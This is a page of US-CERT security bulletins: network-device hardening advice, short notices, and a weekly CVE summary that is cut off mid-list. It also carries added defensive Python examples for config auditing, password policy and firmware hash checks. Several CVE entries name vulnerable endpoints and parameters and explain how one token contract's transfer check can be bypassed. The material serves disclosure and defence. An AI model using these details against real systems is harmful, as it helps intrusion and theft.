Security Bulletins

US-CERT: The United States Computer Emergency Readiness Team
last updated: Fri, 22 Jun 2018 10:50:07 GMT

 Thu, 21 Jun 2018 20:10:15 +0000 Global Threats to Information Systems
Original release date: June 21, 2018

The advanced capabilities of organized hacker groups and cyber threat actors are an increasing global threat to information systems. Rising threat levels place more demands on cybersecurity personnel and network administrators to protect information systems. Protecting network infrastructure is critical to preserving the confidentiality, integrity, and availability of communication and services across an enterprise.

Cyber campaigns—such as NotPetya—are examples of increasingly advanced threat actor activity. NotPetya coincided with a national holiday of the targeted nation. NCCIC recommends organizations remain vigilant and aware of potential malicious cyber activity ahead of upcoming national holidays, including Ukraine’s Constitution Day on June 28, 2018.

NCCIC encourages users and administrators to review Securing Network Infrastructure Devices and the United Kingdom’s National Cyber Security Centre (NCSC) guidance on Internet Edge Device Security and implement the following recommendations:

  • Segregate networks and functions.
  • Limit unnecessary lateral communications.
  • Harden network devices.
  • Secure access to infrastructure devices.
  • Perform out-of-band network management.
  • Validate hardware and software integrity.

This product is provided subject to this Notification and this Privacy & Use policy.


 Thu, 21 Jun 2018 19:46:35 +0000 ST18-001: Securing Network Infrastructure Devices
Original release date: June 21, 2018

Network infrastructure devices are ideal targets for malicious cyber actors. Most or all organizational and customer traffic must traverse these critical devices.

  • An attacker with presence on an organization’s gateway router can monitor, modify, and deny traffic to and from the organization.
  • An attacker with presence on an organization’s internal routing and switching infrastructure can monitor, modify, and deny traffic to and from key hosts inside the network and leverage trust relationships to conduct lateral movement to other hosts.

Organizations and individuals that use legacy, unencrypted protocols to manage hosts and services make successful credential harvesting easy for these malicious cyber actors. Whoever controls the routing infrastructure of a network essentially controls the data flowing through the network.

What are network infrastructure devices?

Network infrastructure devices are the physical components of a network that transport communications needed for data, applications, services, and multi-media. These devices include routers, firewalls, switches, servers, load-balancers, intrusion detection systems, domain name systems, and storage area networks.

What security threats are associated with network infrastructure devices?

Network infrastructure devices are often easy targets for attackers. Once installed, many network devices are not maintained at the same security level as general-purpose desktops and servers. The following factors can also contribute to the vulnerability of network devices:

  • Few network devices—especially small office/home office and residential-class routers—run antivirus, integrity-maintenance, and other security tools that help protect general-purpose hosts.
  • Manufacturers build and distribute these network devices with exploitable services, which are enabled for ease of installation, operation, and maintenance.
  • Owners and operators of network devices often don’t change vendor default settings, harden them for operations, or perform regular patching.
  • Internet service providers may not replace equipment on a customer’s property once the equipment is no longer supported by the manufacturer or vendor.
  • Owners and operators often overlook network devices when they investigate, look for intruders, and restore general-purpose hosts after cyber intrusions.

How can you improve the security of network infrastructure devices?

NCCIC encourages users and network administrators to implement the following recommendations to better secure their network infrastructure:

  • Segment and segregate networks and functions.
  • Limit unnecessary lateral communications.
  • Harden network devices.
  • Secure access to infrastructure devices.
  • Perform Out-of-Band network management.
  • Validate integrity of hardware and software.

Segment and Segregate Networks and Functions

Security architects must consider the overall infrastructure layout, including segmentation and segregation. Proper network segmentation is an effective security mechanism to prevent an intruder from propagating exploits or laterally moving around an internal network. On a poorly segmented network, intruders are able to extend their impact to control critical devices or gain access to sensitive data and intellectual property. Segregation separates network segments based on role and functionality. A securely segregated network can contain malicious occurrences, reducing the impact from intruders in the event that they have gained a foothold somewhere inside the network.

Physical Separation of Sensitive Information

Traditional network devices, such as routers, can separate local area network (LAN) segments. Organizations can place routers between networks to create boundaries, increase the number of broadcast domains, and effectively filter users’ broadcast traffic. Organizations can use these boundaries to contain security breaches by restricting traffic to separate segments and can even shut down segments of the network during an intrusion, restricting adversary access.

Recommendations

  • Implement principles of least privilege and need-to-know when designing network segments.
  • Separate sensitive information and security requirements into network segments.
  • Apply security recommendations and secure configurations to all network segments and network layers.

Virtual Separation of Sensitive Information

As technologies change, new strategies are developed to improve information technology efficiencies and network security controls. Virtual separation is the logical isolation of networks on the same physical network. Virtual segmentation uses the same design principles as physical segmentation but requires no additional hardware. Existing technologies can be used to prevent an intruder from breaching other internal network segments.

Recommendations

  • Use private virtual LANs to isolate a user from the rest of the broadcast domains.
  • Use virtual routing and forwarding (VRF) technology to segment network traffic over multiple routing tables simultaneously on a single router.
  • Use virtual private networks (VPNs) to securely extend a host/network by tunneling through public or private networks.

Limit Unnecessary Lateral Communications

Allowing unfiltered peer-to-peer communications, including workstation-to-workstation, creates serious vulnerabilities and can allow a network intruder’s access to spread easily to multiple systems. Once an intruder establishes an effective beachhead within the network, unfiltered lateral communications allow the intruder to create backdoors throughout the network. Backdoors help the intruder maintain persistence within the network and hinder defenders’ efforts to contain and eradicate the intruder.

Recommendations

  • Restrict communications using host-based firewall rules to deny the flow of packets from other hosts in the network. The firewall rules can be created to filter on a host device, user, program, or internet protocol (IP) address to limit access from services and systems.
  • Implement a VLAN Access Control List (VACL), a filter that controls access to and from VLANs. VACL filters should be created to deny packets the ability to flow to other VLANs.
  • Logically segregate the network using physical or virtual separation, allowing network administrators to isolate critical devices onto network segments.

Harden Network Devices

A fundamental way to enhance network infrastructure security is to safeguard networking devices with secure configurations. Government agencies, organizations, and vendors supply a wide range of guidance to administrators—including benchmarks and best practices—on how to harden network devices. Administrators should implement the following recommendations in conjunction with laws, regulations, site security policies, standards, and industry best practices.

Recommendations

  • Disable unencrypted remote admin protocols used to manage network infrastructure (e.g., Telnet, File Transfer Protocol [FTP]).
  • Disable unnecessary services (e.g., discovery protocols, source routing, Hypertext Transfer Protocol, Simple Network Management Protocol [SNMP], Bootstrap Protocol).
  • Use SNMPv3 (or subsequent version), but do not use SNMP community strings.
  • Secure access to the console, auxiliary, and virtual terminal lines.
  • Implement robust password policies, and use the strongest password encryption available.
  • Protect routers and switches by controlling access lists for remote administration.
  • Restrict physical access to routers and switches.
  • Back up configurations and store them offline. Use the latest version of the network device operating system and keep it updated with all patches.
  • Periodically test security configurations against security requirements.
  • Protect configuration files with encryption or access controls when sending, storing, and backing up files.
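
One way to run the periodic configuration test from the list above, shown as an added example (not NCCIC's code): a small auditor that maps findings in a device configuration back to these recommendations. It assumes Cisco IOS-style syntax; both sample configurations, the host name and the ACL name are constructed.

```python
import re

# Constructed IOS-style configurations (sample input, not from a real device).
WEAK_CONFIG = """\
hostname edge-rtr-01
enable password Winter2018
ip http server
ip source-route
cdp run
snmp-server community public RO
line vty 0 4
 transport input telnet ssh
 login local
"""

HARDENED_CONFIG = """\
hostname edge-rtr-01
enable secret 9 $9$constructed$placeholder
no ip http server
no ip source-route
no cdp run
snmp-server group NETOPS v3 priv
ip access-list standard MGMT-HOSTS
 permit 192.0.2.10
line vty 0 4
 access-class MGMT-HOSTS in
 transport input ssh
 login local
"""

# (finding id, pattern for top-level lines, recommendation it maps to)
GLOBAL_RULES = [
    ("weak-enable-password", re.compile(r"^enable password\b"),
     "Use the strongest password encryption available"),
    ("http-server", re.compile(r"^ip http server\b"),
     "Disable unnecessary services (HTTP)"),
    ("source-routing", re.compile(r"^ip source-route\b"),
     "Disable unnecessary services (source routing)"),
    ("discovery-protocol", re.compile(r"^(cdp|lldp) run\b"),
     "Disable unnecessary services (discovery protocols)"),
    ("snmp-community", re.compile(r"^snmp-server community\b"),
     "Use SNMPv3; do not use SNMP community strings"),
]
SECRET_PREFIXES = ("enable password", "snmp-server community")


def parse_sections(config_text):
    """Group the config into (top-level line, [indented child lines]) pairs."""
    sections = []
    for raw in config_text.splitlines():
        line = raw.rstrip()
        if not line or line.lstrip().startswith("!"):
            continue  # skip blanks and comment separators
        if line[0].isspace() and sections:
            sections[-1][1].append(line.strip())
        else:
            sections.append((line.strip(), []))
    return sections


def redact(line):
    """Mask secret values so the audit report does not leak them."""
    if line.startswith(SECRET_PREFIXES):
        return " ".join(line.split()[:2] + ["<redacted>"])
    return line


def audit(config_text):
    """Return a list of (finding id, evidence, recommendation) tuples."""
    findings = []
    for header, children in parse_sections(config_text):
        for finding_id, pattern, advice in GLOBAL_RULES:
            if pattern.search(header):
                findings.append((finding_id, redact(header), advice))
        if header.startswith("line vty"):
            for child in children:
                if child.startswith("transport input") and re.search(
                        r"\b(telnet|all)\b", child):
                    findings.append(("telnet-on-vty", f"{header}: {child}",
                                     "Disable unencrypted remote admin protocols"))
            has_acl = any(c.startswith("access-class ") and "in" in c.split()[2:]
                          for c in children)
            if not has_acl:
                findings.append(("vty-no-acl", header,
                                 "Control access lists for remote administration"))
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        results = audit(cfg)
        print(f"{name}: {len(results)} finding(s)")
        for finding_id, evidence, advice in results:
            print(f"  [{finding_id}] {evidence} -> {advice}")
```
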

Secure Access to Infrastructure Devices

Administrative privileges can be granted to allow users access to resources that are not widely available. Limiting administrative privileges for infrastructure devices is crucial to security because intruders can exploit administrative privileges that are improperly authorized, granted widely, or not closely audited. Adversaries can use these compromised privileges to traverse a network, expand access, and take full control of the infrastructure backbone. Organizations can mitigate unauthorized infrastructure access by implementing secure access policies and procedures.

Recommendations

  • Implement multi-factor authentication (MFA). Authentication is a process used to validate a user’s identity. Attackers commonly exploit weak authentication processes. MFA uses at least two identity components to authenticate a user’s identity. Identity components include
    • something the user knows (e.g., password),
    • an object the user has possession of (e.g., token), and
    • a trait unique to the user (e.g., fingerprint).
  • Manage privileged access. Use a server that provides authentication, authorization, and accounting (AAA) services to store access information for network device management. An AAA server will enable network administrators to assign different privilege levels to users based on the principle of least privilege. When a user tries to execute an unauthorized command, it will be rejected. If possible, implement a hard-token authentication server in addition to using the AAA server. Using MFA makes it more difficult for intruders to steal and reuse credentials to gain access to network devices.
  • Manage administrative credentials. Take these actions if your system cannot meet the MFA best practice:
    • Change default passwords.
    • Recommend passwords to be at least 8 characters long, and allow passwords as long as 64 characters (or greater), in accordance with the National Institute of Standards and Technology’s SP 800-63B Digital Identity Guidelines and Canada’s User Authentication Guidance for Information Technology Systems ITSP.30.031 V3.
    • Check passwords against blacklists of unacceptable values, such as commonly used, expected, or compromised passwords.
    • Ensure all stored passwords are salted and hashed.
    • Keep passwords stored for emergency access in a protected off-network location, such as a safe.
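
The credential rules above (length bounds, blacklist check, default-password rejection, salted and hashed storage), sketched as an added example that is not part of the original bulletin. The blocklist contents, the 64-character upper cap, the PBKDF2 work factor and the record format are assumptions made for the illustration.

```python
import hashlib
import hmac
import os
import unicodedata

MIN_LENGTH = 8               # minimum from the recommendation above
MAX_LENGTH = 64              # must accept at least 64; this example caps there (assumption)
PBKDF2_ITERATIONS = 600_000  # assumed work factor; tune for your hardware
# Constructed sample blocklist; a real one holds common and breached passwords.
BLOCKLIST = {"password", "12345678", "changeme", "letmein123", "admin1234"}


def normalize(password):
    """Normalize Unicode so visually identical inputs compare and hash equally."""
    return unicodedata.normalize("NFKC", password)


def check_password(password, device_default=None):
    """Return a list of policy violations; an empty list means acceptable."""
    pw = normalize(password)
    problems = []
    if len(pw) < MIN_LENGTH:
        problems.append("too_short")
    if len(pw) > MAX_LENGTH:
        problems.append("too_long")
    if pw.casefold() in BLOCKLIST:
        problems.append("blocklisted")
    # "Change default passwords": refuse to keep the value the device shipped with.
    if device_default is not None and pw == normalize(device_default):
        problems.append("vendor_default")
    return problems


def hash_password(password):
    """Return a storable record: scheme$iterations$salt$digest (hex fields)."""
    salt = os.urandom(16)  # fresh random salt per password
    digest = hashlib.pbkdf2_hmac(
        "sha256", normalize(password).encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password, record):
    """Recompute the hash with the stored salt and compare in constant time."""
    scheme, iterations, salt_hex, digest_hex = record.split("$")
    if scheme != "pbkdf2_sha256":
        raise ValueError("unsupported scheme")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", normalize(password).encode("utf-8"),
        bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    for candidate in ("abc", "ChangeMe", "correct horse battery staple"):
        print(repr(candidate), check_password(candidate) or "accepted")
    record = hash_password("correct horse battery staple")
    print(record.split("$")[0], verify_password("correct horse battery staple", record))
```
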

Perform Out-of-Band Management

Out-of-Band (OoB) management uses alternate communication paths to remotely manage network infrastructure devices. These dedicated communication paths can vary in configuration to include anything from virtual tunneling to physical separation. Using OoB access to manage the network infrastructure will strengthen security by limiting access and separating user traffic from network management traffic. OoB management provides security monitoring and can perform corrective actions without allowing the adversary (even one who has already compromised a portion of the network) to observe these changes.

OoB management can be implemented physically, virtually, or through a hybrid of the two. Although additional physical network infrastructure can be very expensive to implement and maintain, it is the most secure option for network managers to adopt. Virtual implementation is less costly but still requires significant configuration changes and administration. In some situations, such as access to remote locations, virtual encrypted tunnels may be the only viable option.

Recommendations

  • Segregate standard network traffic from management traffic.
  • Ensure that management traffic on devices comes only from OoB.
  • Apply encryption to all management channels.
  • Encrypt all remote access to infrastructure devices such as terminal or dial-in servers.
  • Manage all administrative functions from a dedicated, fully patched host over a secure channel, preferably on OoB.
  • Harden network management devices by testing patches, turning off unnecessary services on routers and switches, and enforcing strong password policies. Monitor the network and review logs. Implement access controls that only permit required administrative or management services (e.g., SNMP, Network Time Protocol, Secure Shell, FTP, Trivial File Transfer Protocol, RDP, SMB).

Validate Integrity of Hardware and Software

Products purchased through unauthorized channels are often counterfeit, secondary, or grey market devices. Numerous media reports have described the introduction of grey market hardware and software into the marketplace. Illegitimate hardware and software present a serious risk to users’ information and the overall integrity of the network environment. Grey market products can introduce risks to the network because they have not been thoroughly tested to meet quality standards. Purchasing products from the secondary market carries the risk of acquiring counterfeit, stolen, or second-hand devices because of supply chain breaches. Furthermore, breaches in the supply chain provide an opportunity for malicious software and hardware to be installed on the equipment. Compromised hardware and software can affect network performance and compromise the confidentiality, integrity, or availability of network assets. Finally, unauthorized or malicious software can be loaded onto a device after it is in operational use, so organizations should regularly check the integrity of software.

Recommendations

  • Maintain strict control of the supply chain and purchase only from authorized resellers.
  • Require resellers to enforce integrity checks of the supply chain to validate hardware and software authenticity.
  • Upon installation, inspect all devices for signs of tampering.
  • Validate serial numbers from multiple sources.
  • Download software, updates, patches, and upgrades from validated sources.
  • Perform hash verification, and compare values against the vendor’s database to detect unauthorized modification to the firmware.
  • Monitor and log devices—verifying network configurations of devices—on a regular schedule.
  • Train network owners, administrators, and procurement personnel to increase awareness of grey market devices.
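
The hash-verification step above, as an added example that is not part of the original bulletin: firmware images are hashed in chunks and compared with the vendor's published values, and images the vendor never listed are reported separately from mismatches. The file names, the image bytes and the "vendor" hash list are constructed for the demo; in practice the published values come from the vendor over a separate, validated channel.

```python
import hashlib
import os
import tempfile


def sha512_file(path, chunk_size=1 << 20):
    """Hash a file in chunks so large firmware images need not fit in memory."""
    digest = hashlib.sha512()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_images(image_paths, vendor_hashes):
    """Map each image file name to OK, MISMATCH or NOT_IN_VENDOR_LIST."""
    # Published values are often upper case or carry trailing whitespace.
    published = {name: value.strip().lower() for name, value in vendor_hashes.items()}
    results = {}
    for path in image_paths:
        name = os.path.basename(path)
        expected = published.get(name)
        if expected is None:
            results[name] = "NOT_IN_VENDOR_LIST"  # cannot be validated at all
        elif sha512_file(path) == expected:
            results[name] = "OK"
        else:
            results[name] = "MISMATCH"  # modified, corrupted or wrong image
    return results


def demo():
    """Build three constructed images in a temp directory and verify them."""
    genuine = b"CONSTRUCTED-FIRMWARE-IMAGE v1.0\n" * 1024
    # Stand-in for the vendor's published hash database (constructed values).
    vendor_hashes = {
        "router-os-1.0.bin": hashlib.sha512(genuine).hexdigest().upper() + "\n",
        "switch-os-2.3.bin": hashlib.sha512(genuine).hexdigest(),
    }
    images = {
        "router-os-1.0.bin": genuine,              # untouched image
        "switch-os-2.3.bin": genuine + b"\x90",    # one extra byte appended
        "unlisted-os-9.9.bin": genuine,            # vendor publishes no hash for it
    }
    with tempfile.TemporaryDirectory() as workdir:
        paths = []
        for name, content in images.items():
            path = os.path.join(workdir, name)
            with open(path, "wb") as fh:
                fh.write(content)
            paths.append(path)
        return verify_images(paths, vendor_hashes)


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{status:20} {name}")
```
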

Author: NCCIC Publications


 Wed, 20 Jun 2018 18:45:51 +0000 Cisco Releases Security Updates for Multiple Products
Original release date: June 20, 2018

Cisco has released several updates to address vulnerabilities affecting multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

NCCIC encourages users and administrators to review the following Cisco Security Advisories and apply the necessary updates:




 Mon, 18 Jun 2018 21:42:50 +0000 FTC, Partners Help Small Businesses Stop Scams
Original release date: June 18, 2018

The Federal Trade Commission (FTC) has launched Operation Main Street, an effort with the Better Business Bureau (BBB) and law enforcement to educate small business owners on how to stop scams targeting their businesses. Accordingly, FTC released Scams and Your Small Business, a guide for businesses detailing how to avoid, identify, and report scams.

NCCIC encourages business owners and other consumers to review the FTC article and NCCIC's Resources for Small and Midsize Businesses.




 Mon, 18 Jun 2018 10:52:15 +0000 SB18-169: Vulnerability Summary for the Week of June 11, 2018
Original release date: June 18, 2018

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities corresponds to the following scores:

  • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0

  • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9

  • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

 

The NCCIC Weekly Vulnerability Summary Bulletin is created using information from the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD). In some cases, the vulnerabilities in the Bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.

High Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
microsoft -- windows_10 | An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This affects Windows 10, Windows 10 Servers. | 2018-06-14 | 7.2 | CVE-2018-8233, BID, SECTRACK, CONFIRM
microsoft -- windows_10 | A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka "Media Foundation Memory Corruption Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. | 2018-06-14 | 7.6 | CVE-2018-8251, BID, SECTRACK, CONFIRM

Medium Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
There were no medium vulnerabilities recorded this week.

Low Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
There were no low vulnerabilities recorded this week.

Severity Not Yet Assigned

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
389-ds-base -- 389-ds-base | 389-ds-base before versions 1.4.0.10, 1.3.8.3 is vulnerable to a race condition in the way 389-ds-base handles persistent search, resulting in a crash if the server is under load. An anonymous attacker could use this flaw to trigger a denial of service. | 2018-06-13 | not yet calculated | CVE-2018-10850, CONFIRM, CONFIRM, CONFIRM
acccheck -- acccheck | acccheck.pl in acccheck 0.2.1 allows Command Injection via shell metacharacters in a username or password file, as demonstrated by injection into an smbclient command line. | 2018-06-13 | not yet calculated | CVE-2018-12268, MISC
apache -- geode | When an Apache Geode server versions 1.0.0 to 1.4.0 is configured with a security manager, a user with DATA:WRITE privileges is allowed to deploy code by invoking an internal Geode function. This allows remote code execution. Code deployment should be restricted to users with DATA:MANAGE privilege. | 2018-06-13 | not yet calculated | CVE-2017-15695, BID, MLIST
apache -- tika | Archive.java in Junrar before 1.0.1, as used in Apache Tika and other products, is affected by a denial of service vulnerability due to an infinite loop when handling corrupt RAR files. | 2018-06-14 | not yet calculated | CVE-2018-12418, MISC, MISC
apple -- ios_and_safari | An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. The issue involves the "Safari" component. It allows remote attackers to cause a denial of service (persistent Safari outage) via a crafted web site. | 2018-06-08 | not yet calculated | CVE-2018-4247, BID, SECTRACK, CONFIRM, CONFIRM, MISC
apple -- macos_and_osx | An issue was discovered in Yelp OSXCollector. A maliciously crafted Universal/fat binary can evade third-party code signing checks. By not completing full inspection of the Universal/fat binary, the user of the third-party tool will believe that the code is signed by Apple, but the malicious unsigned code will execute. | 2018-06-13 | not yet calculated | CVE-2018-10406, MISC
apple -- macos_and_osx | An issue was discovered in Google Santa and molcodesignchecker. A maliciously crafted Universal/fat binary can evade third-party code signing checks. By not completing full inspection of the Universal/fat binary, the user of the third-party tool will believe that the code is signed by Apple, but the malicious unsigned code will execute. | 2018-06-13 | not yet calculated | CVE-2018-10405, MISC
apple -- macos_and_osx | An issue was discovered in F-Secure XFENCE and Little Flocker. A maliciously crafted Universal/fat binary can evade third-party code signing checks. By not completing full inspection of the Universal/fat binary, the user of the third-party tool will believe that the code is signed by Apple, but the malicious unsigned code will execute. | 2018-06-13 | not yet calculated | CVE-2018-10403, MISC
apple -- macos_and_osx | An issue was discovered in Objective-See KnockKnock, LuLu, TaskExplorer, WhatsYourSign, and procInfo. A maliciously crafted Universal/fat binary can evade third-party code signing checks. By not completing full inspection of the Universal/fat binary, the user of the third-party tool will believe that the code is signed by Apple, but the malicious unsigned code will execute. | 2018-06-13 | not yet calculated | CVE-2018-10404, MISC
apple -- macos_and_osx | An issue was discovered in Carbon Black Cb Response. A maliciously crafted Universal/fat binary can evade third-party code signing checks. By not completing full inspection of the Universal/fat binary, the user of the third-party tool will believe that the code is signed by Apple, but the malicious unsigned code will execute. | 2018-06-13 | not yet calculated | CVE-2018-10407, MISC
apple -- macos_and_osx | An issue was discovered in VirusTotal. A maliciously crafted Universal/fat binary can evade third-party code signing checks. By not completing full inspection of the Universal/fat binary, the user of the third-party tool will believe that the code is signed by Apple, but the malicious unsigned code will execute. | 2018-06-13 | not yet calculated | CVE-2018-10408, MISC
apple -- multiple_products | An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code via a crafted web site that leverages a getWasmBufferFromValue out-of-bounds read during WebAssembly compilation. | 2018-06-08 | not yet calculated | CVE-2018-4222, SECTRACK, MISC, CONFIRM, CONFIRM, CONFIRM, CONFIRM, CONFIRM, CONFIRM, EXPLOIT-DB
apple -- multiple_products | An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site that triggers an @generatorState use-after-free. | 2018-06-08 | not yet calculated | CVE-2018-4218, SECTRACK, MISC, CONFIRM, CONFIRM, CONFIRM, CONFIRM, CONFIRM, CONFIRM, EXPLOIT-DB
apple -- safari | An issue was discovered in certain Apple products. Safari before 11.1.1 is affected. The issue involves the "Safari" component. It allows remote attackers to spoof the address bar via a crafted web site. | 2018-06-08 | not yet calculated | CVE-2018-4205, BID, SECTRACK, CONFIRM
artica -- pandora_fms | Local File Inclusion (LFI) in Artica Pandora FMS through version 7.23 allows an attacker to call any php file via the /pandora_console/ajax.php ajax endpoint. | 2018-06-15 | not yet calculated | CVE-2018-11222, MISC, CONFIRM
artica -- pandora_fms | XSS in Artica Pandora FMS before 7.0 NG 723 allows an attacker to execute arbitrary code via a crafted "refr" parameter in a "/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=" call. | 2018-06-15 | not yet calculated | CVE-2018-11223, MISC, CONFIRM
artica -- pandora_fms | Unauthenticated untrusted file upload in Artica Pandora FMS through version 7.23 allows an attacker to upload an arbitrary plugin via include/ajax/update_manager.ajax in the update system. | 2018-06-15 | not yet calculated | CVE-2018-11221, MISC, CONFIRM
articlecms -- articlecms | ArticleCMS through 2017-02-19 has XSS via an "add an article" action. | 2018-06-13 | not yet calculated | CVE-2018-12339, MISC
automated_logic_corporation -- webctrl | An XXE issue was discovered in Automated Logic Corporation (ALC) WebCTRL Versions 6.0, 6.1 and 6.5. An unauthenticated attacker could enter malicious input to WebCTRL and a weakly configured XML parser will allow the application to disclose full file contents from the underlying web server OS via the "X-Wap-Profile" HTTP header. | 2018-06-14 | not yet calculated | CVE-2018-8819, MISC, FULLDISC, MISC
blackcatcms -- blackcatcms | Cross-site scripting (XSS) vulnerability in backend/pages/modify.php in BlackCatCMS 1.3 allows remote authenticated users with the Admin role to inject arbitrary web script or HTML via the search panel. | 2018-06-14 | not yet calculated | CVE-2018-10821, CONFIRM, CONFIRM
boringssl -- boringssl | BoringSSL through 2018-06-14 allows a memory-cache side-channel attack on DSA signatures, aka the Return Of the Hidden Number Problem or ROHNP. To discover a DSA key, the attacker needs access to either the local machine or a different virtual machine on the same physical host. | 2018-06-14 | not yet calculated | CVE-2018-12440, MISC
botan -- botan | Botan 2.5.0 through 2.6.0 allows a memory-cache side-channel attack on ECDSA signatures, aka the Return Of the Hidden Number Problem or ROHNP, related to dsa/dsa.cpp, ec_group/ec_group.cpp, and ecdsa/ecdsa.cpp. To discover an ECDSA key, the attacker needs access to either the local machine or a different virtual machine on the same physical host. | 2018-06-14 | not yet calculated | CVE-2018-12435, CONFIRM, MISC
canon -- printme_efi_webinterface | Cross-site scripting (XSS) vulnerability in the Canon PrintMe EFI webinterface allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the /wt3/mydocs.php URI. | 2018-06-11 | not yet calculated | CVE-2018-12111, MISC, EXPLOIT-DB
chevereto_free -- chevereto_free | Chevereto Free before 1.0.13 has XSS. | 2018-06-15 | not yet calculated | CVE-2018-12030, MISC, CONFIRM
digium -- asterisk | An issue was discovered in Asterisk Open Source 13.x before 13.21.1, 14.x before 14.7.7, and 15.x before 15.4.1 and Certified Asterisk 13.18-cert before 13.18-cert4 and 13.21-cert before 13.21-cert2. When endpoint specific ACL rules block a SIP request, they respond with a 403 forbidden. However, if an endpoint is not identified, then a 401 unauthorized response is sent. This vulnerability just discloses which requests hit a defined endpoint. The ACL rules cannot be bypassed to gain access to the disclosed endpoints. | 2018-06-12 | not yet calculated | CVE-2018-12227, CONFIRM, BID, CONFIRM
digium -- asterisk | An issue was discovered in Asterisk Open Source 15.x before 15.4.1. When connected to Asterisk via TCP/TLS, if the client abruptly disconnects, or sends a specially crafted message, then Asterisk gets caught in an infinite loop while trying to read the data stream. This renders the system unusable. | 2018-06-12 | not yet calculated | CVE-2018-12228, CONFIRM, BID, CONFIRM
dimofinf -- cms | Cross-site scripting (XSS) vulnerability in news.php in Dimofinf CMS Version 3.0.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter. | 2018-06-11 | not yet calculated | CVE-2018-12094, MISC, EXPLOIT-DB
discount -- discount | The quoteblock function in markdown.c in libmarkdown.a in DISCOUNT 2.2.3a allows remote attackers to cause a denial of service (heap-based buffer over-read) via a crafted file. | 2018-06-15 | not yet calculated | CVE-2018-12495, MISC
dropbox -- lepton | An issue was discovered in Dropbox Lepton 1.2.1. The validateAndCompress function in validation.cc allows remote attackers to cause a denial of service (SIGFPE and application crash) via a malformed file. | 2018-06-11 | not yet calculated | CVE-2018-12108, MISC
elliptic_curve -- cryptography_library | The Elliptic Curve Cryptography library (aka sunec or libsunec) allows a memory-cache side-channel attack on ECDSA signatures, aka the Return Of the Hidden Number Problem or ROHNP. To discover an ECDSA key, the attacker needs access to either the local machine or a different virtual machine on the same physical host. | 2018-06-14 | not yet calculated | CVE-2018-12438, MISC
enigmail -- enigmail | The signature verification routine in Enigmail before 2.0.7 interprets user ids as status/control messages and does not correctly keep track of the status of multiple signatures, which allows remote attackers to spoof arbitrary email signatures via public keys containing crafted primary user ids. | 2018-06-13 | not yet calculated | CVE-2018-12019, MISC, MISC
ethereum -- futurxe_token
 
The transferFrom function of a smart contract implementation for FuturXE (FXE), an Ethereum ERC20 token, allows attackers to accomplish an unauthorized transfer of digital assets because of a logic error. The developer messed up with the boolean judgment - if the input value is smaller than or equal to allowed value, the transfer session would stop execution by returning false. This makes no sense, because the transferFrom() function should require the transferring value to not exceed the allowed value in the first place. Suppose this function asks for the allowed value to be smaller than the input. Then, the attacker could easily ignore the allowance: after this condition, the `allowed[from][msg.sender] -= value;` would cause an underflow because the allowed part is smaller than the value. The attacker could transfer any amount of FuturXe tokens of any accounts to an appointed account (the `_to` address) because the allowed value is initialized to 0, and the attacker could bypass this restriction even without the victim's private key.2018-06-11not yet calculatedCVE-2018-12025
MISC
exadel -- flamingo_amf-serializer
 
The Java implementation of AMF3 deserializers used by Flamingo amf-serializer by Exadel, version 2.2.0, allows external entity references (XXEs) from XML documents embedded within AMF3 messages. If the XML parsing is handled incorrectly, it could potentially lead to exposure of sensitive data on the server, denial of service, or server-side request forgery. 2018-06-11 not yet calculated CVE-2017-3206
BID
MISC
MISC
CERT-VN
exadel -- flamingo_amf-serializer
 
